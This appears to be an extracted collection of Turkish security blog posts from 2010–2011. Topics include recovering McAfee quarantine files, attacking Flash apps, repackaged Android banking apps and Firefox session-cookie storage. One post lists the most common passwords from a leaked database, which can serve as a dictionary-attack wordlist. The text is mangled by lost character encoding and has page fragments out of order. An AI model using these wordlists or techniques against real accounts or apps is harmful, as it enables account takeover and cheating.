Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 9: Hack 4 Career - 2011

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

